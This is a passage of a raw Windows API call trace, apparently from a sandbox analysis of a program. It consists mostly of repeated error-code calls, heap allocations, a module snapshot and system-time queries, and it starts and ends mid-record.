(dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.304] SetLastError (dwErrCode=0x0) [0120.304] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.305] SetLastError (dwErrCode=0x0) [0120.305] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.306] SetLastError (dwErrCode=0x0) [0120.306] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.307] GetLastError () returned 0x0 [0120.307] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.308] SetLastError (dwErrCode=0x0) [0120.308] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.309] GetLastError () returned 0x0 [0120.309] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.310] SetLastError (dwErrCode=0x0) [0120.310] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.311] SetLastError (dwErrCode=0x0) [0120.311] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x74) returned 0x781990 [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.312] SetLastError (dwErrCode=0x0) [0120.312] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.381] SetLastError (dwErrCode=0x0) [0120.381] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.382] GetLastError () returned 0x0 [0120.382] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.383] SetLastError (dwErrCode=0x0) [0120.383] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.384] GetLastError () returned 0x0 [0120.384] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.385] SetLastError (dwErrCode=0x0) [0120.385] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.386] GetLastError () returned 0x0 [0120.386] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.387] SetLastError (dwErrCode=0x0) [0120.387] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.388] GetLastError () returned 0x0 [0120.388] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.389] SetLastError (dwErrCode=0x0) [0120.389] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.390] SetLastError (dwErrCode=0x0) [0120.390] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.391] GetLastError () returned 0x0 [0120.391] SetLastError (dwErrCode=0x0) [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x98) returned 0x781a10 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1f) returned 0x781ab0 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x36) returned 0x781ad8 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x37) returned 0x781b18 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x3c) returned 0x781b58 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x31) returned 0x781ba0 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x17) returned 0x781be0 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x24) returned 0x781c00 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x14) returned 0x781c30 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xd) returned 0x781c50 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x25) returned 0x781c68 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x39) returned 0x781c98 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x18) returned 0x781ce0 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x17) returned 0x781d00 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xe) returned 0x781d20 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x69) returned 0x781d38 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x3e) returned 0x781db0 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1b) returned 0x781df8 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1d) returned 0x781e20 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x48) returned 0x781e48 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x12) returned 0x781e98 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x18) returned 0x781eb8 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1b) returned 0x781ed8 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x24) returned 0x781f00 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x29) returned 0x781f30 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1e) returned 0x781f68 [0120.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x41) returned 0x781f90 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x17) returned 0x781fe8 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xf) returned 0x782008 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x16) returned 0x782020 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x2a) returned 0x782040 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x29) returned 0x782078 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x15) returned 0x7820b0 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1e) returned 0x7820d0 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x2a) returned 0x7820f8 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x12) returned 0x782130 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x18) returned 0x782150 [0120.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x46) returned 0x782170 [0120.393] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7811f8 | out: hHeap=0x780000) returned 1 [0120.395] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x800) returned 0x7821c0 [0120.395] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x80) returned 0x7811f8 [0120.395] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0120.395] RtlSizeHeap (HeapHandle=0x780000, Flags=0x0, MemoryPointer=0x7811f8) returned 0x80 [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.396] GetLastError () returned 0x0 [0120.396] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.397] SetLastError (dwErrCode=0x0) [0120.397] GetLastError () returned 0x0 [0120.398] SetLastError (dwErrCode=0x0) [0120.398] GetLastError () returned 0x0 [0120.398] SetLastError (dwErrCode=0x0) [0120.398] GetLastError () returned 0x0 [0120.398] SetLastError (dwErrCode=0x0) [0120.398] GetLastError () returned 0x0 [0120.398] SetLastError (dwErrCode=0x0) [0120.398] GetLastError () returned 0x0 [0120.398] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0120.398] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0120.399] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0120.399] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0120.401] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0120.401] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0120.401] GetTickCount () returned 0x1150187 [0120.401] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.402] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.402] GetACP () returned 0x4e4 [0120.402] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.403] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.403] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.403] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.404] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.404] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.404] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.404] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.404] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, 